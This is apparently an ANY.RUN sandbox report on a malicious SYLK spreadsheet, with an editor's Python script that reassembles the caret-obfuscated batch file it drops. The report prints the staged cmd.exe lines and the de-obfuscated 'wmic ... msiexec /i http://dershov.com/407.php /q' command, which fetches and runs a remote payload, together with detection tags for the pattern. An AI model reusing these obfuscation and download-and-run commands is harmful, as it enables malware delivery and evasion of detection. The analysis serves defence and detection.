File name: | William Buckner.slk |
Full analysis: | https://app.any.run/tasks/6f7a2771-2dda-467f-9664-272dc09e4f5c |
Verdict: | Malicious activity |
Analysis date: | March 31, 2020, 02:39:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators, with escape sequences |
MD5: | 8078FB812CB506CE08F371A936F666D4 |
SHA1: | 0A962AD121E96C2BA4D51761E55CDBE9C4DC4082 |
SHA256: | 5F43A9F10FE23D562397A812FDB6B4969F7158D2D45480B36224DC9821072A3D |
SSDEEP: | 48:Us0ZUdZhdqBbJkrKlL4mDAezvIondzHjiPAdHi8AdHW82d0HXWINmqNRCcCp3u0s:yOdPdqBbJNn1zOACgT3qL2i |
Extension | Type
---|---
.slk | SYLK - SYmbolic LinK data (100)
PID | Command line | Image | Parent process | Description (Company) | User / integrity | Exit code | Image version
---|---|---|---|---|---|---|---
3376 | `"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde` | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | explorer.exe | Microsoft Excel (Microsoft Corporation) | admin / MEDIUM | — | 14.0.6024.1000
2420 | `Cmd.exe /c EChO\|SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms">%temp%\wvFXE.b^a^t` | C:\Windows\system32\Cmd.exe | EXCEL.EXE | Windows Command Processor (Microsoft Corporation) | admin / MEDIUM | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1248 | `Cmd.exe /c @echo off&pi^ng 43 -n 1&echo\|set /p="iexec /ihttp^:^/^/^dersh">>%temp%\wvFXE.b^a^t` | C:\Windows\system32\Cmd.exe | EXCEL.EXE | Windows Command Processor (Microsoft Corporation) | admin / MEDIUM | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
660 | `cmd.exe /c @echo off&pi^ng 43 -n 3&echo\|set /p="ov.com/407.php ">>%temp%\wvFXE.b^a^t` | C:\Windows\system32\cmd.exe | EXCEL.EXE | Windows Command Processor (Microsoft Corporation) | admin / MEDIUM | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3300 | `cmd.exe /c @echo off&pi^ng 43 -n 5&echo\|set /p=" ^/q'">>%temp%\wvFXE.bat&%temp%\wvFXE.b^a^t` | C:\Windows\system32\cmd.exe | EXCEL.EXE | Windows Command Processor (Microsoft Corporation) | admin / MEDIUM | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2380 | `ping 43 -n 1` | C:\Windows\system32\PING.EXE | Cmd.exe | TCP/IP Ping Command (Microsoft Corporation) | admin / MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255)
2824 | `C:\Windows\system32\cmd.exe /S /D /c" EChO"` | C:\Windows\system32\cmd.exe | Cmd.exe | Windows Command Processor (Microsoft Corporation) | admin / MEDIUM | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2816 | `C:\Windows\system32\cmd.exe /S /D /c" SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms" 1>C:\Users\admin\AppData\Local\Temp\wvFXE.bat"` | C:\Windows\system32\cmd.exe | Cmd.exe | Windows Command Processor (Microsoft Corporation) | admin / MEDIUM | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2868 | `ping 43 -n 3` | C:\Windows\system32\PING.EXE | cmd.exe | TCP/IP Ping Command (Microsoft Corporation) | admin / MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255)
3144 | `ping 43 -n 5` | C:\Windows\system32\PING.EXE | cmd.exe | TCP/IP Ping Command (Microsoft Corporation) | admin / MEDIUM | 1 | 6.1.7600.16385 (win7_rtm.090713-1255)
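The four cmd.exe children of EXCEL.EXE each write one fragment of `%temp%\wvFXE.bat` with the `echo|set /p="..."` no-newline idiom (the first stage uses `>` to create the file, the next three use `>>` to append, and the last one also runs it), with `ping 43 -n 1/3/5` against an unreachable address serving only to stagger the writes. Because cmd does not treat `^` as an escape inside double quotes, the carets land on disk verbatim and are only collapsed when the batch file executes, which is why no single command line in the table contains the strings `wmic` or `msiexec`. The script below is an added example, not part of the ANY.RUN report: it takes the command lines copied verbatim from the table, reassembles the dropped file, strips the caret escapes to recover what actually ran, and tags each line with detection labels that are this editor's own names rather than any vendor's signatures. The stage order is inferred from the `>`/`>>` redirections and the increasing `-n` counts. Note also that `wmic process call create` launches the child through the WMI provider host, so the resulting msiexec.exe (PID 2400 in the network tables) is not a descendant of Excel and does not appear in this process tree.

```python
"""Reassemble the dropped wvFXE.bat from the cmd.exe command lines in the
process table and strip cmd's caret escapes to recover what actually ran.
Added example for this report; not ANY.RUN's output."""
import re

# Command lines copied verbatim from the process table (PIDs 2420, 1248, 660, 3300),
# in the order the stages write %temp%\wvFXE.bat (> creates, >> appends).
OBSERVED_CMDLINES = [
    r'''Cmd.exe /c EChO|SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms">%temp%\wvFXE.b^a^t''',
    r'''Cmd.exe /c @echo off&pi^ng 43 -n 1&echo|set /p="iexec /ihttp^:^/^/^dersh">>%temp%\wvFXE.b^a^t''',
    r'''cmd.exe /c @echo off&pi^ng 43 -n 3&echo|set /p="ov.com/407.php ">>%temp%\wvFXE.b^a^t''',
    r'''cmd.exe /c @echo off&pi^ng 43 -n 5&echo|set /p=" ^/q'">>%temp%\wvFXE.bat&%temp%\wvFXE.b^a^t''',
]

# `echo|set /p="TEXT"` prints TEXT without a trailing newline, so every stage appends
# exactly one fragment. Inside double quotes cmd keeps ^ literal, so the carets are
# written to disk as-is (the child cmd.exe, PID 2816, still shows them).
FRAGMENT_RE = re.compile(r'set\s+/p\s*=\s*"([^"]*)"', re.IGNORECASE)
CARET_RE = re.compile(r'\^(.)', re.DOTALL)


def extract_fragment(cmdline: str) -> str:
    """Return the text one `set /p=` stage writes, or '' if the line has none."""
    m = FRAGMENT_RE.search(cmdline)
    return m.group(1) if m else ''


def reconstruct_batch(cmdlines) -> str:
    """File content as it lands on disk: fragments concatenated, carets still present."""
    return ''.join(extract_fragment(c) for c in cmdlines)


def decaret(text: str) -> str:
    """What cmd executes when the .bat runs: each ^X outside quotes collapses to X.
    (For detection we strip carets everywhere, which over-approximates cmd's quoting rules.)"""
    return CARET_RE.sub(r'\1', text)


def extract_urls(text: str):
    """Pull http(s) URLs out of de-obfuscated text; '/ihttp://' still matches."""
    return re.findall(r'https?://[^\s\'"]+', text)


def classify(cmdline: str) -> set:
    """Editor-defined detection tags a practitioner could map onto process-creation telemetry."""
    tags = set()
    low = decaret(cmdline).lower()
    if re.search(r'set\s+/p\s*=', low) and '.bat' in low:
        tags.add('set_p_fragment_write')          # chunked script drop via set /p
    if cmdline.count('^') >= 3:
        tags.add('caret_obfuscation')             # heavy caret insertion in one line
    if 'ping' in low and re.search(r'-n\s+\d+', low):
        tags.add('ping_delay')                    # ping used as a sleep between stages
    if all(w in low for w in ('wmic', 'process', 'call', 'create')):
        tags.add('wmic_process_create')           # out-of-tree child via WMI
    if 'msiexec' in low and re.search(r'/i\s*https?://', low):
        tags.add('msiexec_remote_install')        # msiexec fetching a remote "package"
    return tags


if __name__ == '__main__':
    on_disk = reconstruct_batch(OBSERVED_CMDLINES)
    ran = decaret(on_disk)
    print('on disk :', on_disk)
    print('executed:', ran)
    print('urls    :', extract_urls(ran))
    for line in OBSERVED_CMDLINES:
        print(sorted(classify(line)), '<-', line)
    print(sorted(classify(ran)), '<- reconstructed batch')
```

Run stand-alone it prints the on-disk content `@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Msiexec /ihttp^:^/^/^dershov.com/407.php  ^/q'`, the executed form `@echo off&wmic process call create 'Msiexec /ihttp://dershov.com/407.php  /q'`, and the URL that matches the HTTP request table. The per-line tags show why this pattern defeats naive string matching: only the reassembled batch carries `msiexec_remote_install`, while the individual command lines are caught by the `set /p` drop pattern, caret density and the wmic verbs, which is where a detection should sit.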
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3376 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C5E.tmp.cvr | — | — | —
620 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | C68751154B8DAB352576F3CB5896B7CA | 5E6904C3BC949B51B075A644063F4BB88AD4B0DB0EA38F48878AD307247F2A20
1832 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | 0B41C16F13186E319A0DAF3F557479FB | 11BE562FDB8F0A5B7427DF52E83E3889D43AB2A4C1231599AEFA62E147D1BC16
2816 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | 0B41C16F13186E319A0DAF3F557479FB | 11BE562FDB8F0A5B7427DF52E83E3889D43AB2A4C1231599AEFA62E147D1BC16
3176 | cmd.exe | C:\Users\admin\AppData\Local\Temp\wvFXE.bat | text | D348279FDD84AD8CFEACE44F4DBBC193 | 450A02C8FD5E2E89AAC22B2EEE386154EDDC2D6A71F0109030F99CA96632DD9E
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2400 | msiexec.exe | GET | — | 198.54.117.218:80 | http://www.dershov.com/407.php?from=@ | US | — | — | malicious |
2400 | msiexec.exe | GET | 302 | 192.64.119.126:80 | http://dershov.com/407.php | US | html | 60 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | msiexec.exe | 192.64.119.126:80 | dershov.com | Namecheap, Inc. | US | suspicious |
2400 | msiexec.exe | 198.54.117.218:80 | www.dershov.com | Namecheap, Inc. | US | malicious |
Domain | IP | Reputation
---|---|---
dershov.com | 192.64.119.126 | malicious
www.dershov.com | 198.54.117.218 | malicious
PID | Process | Class | Message |
---|---|---|---|
2400 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
2400 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |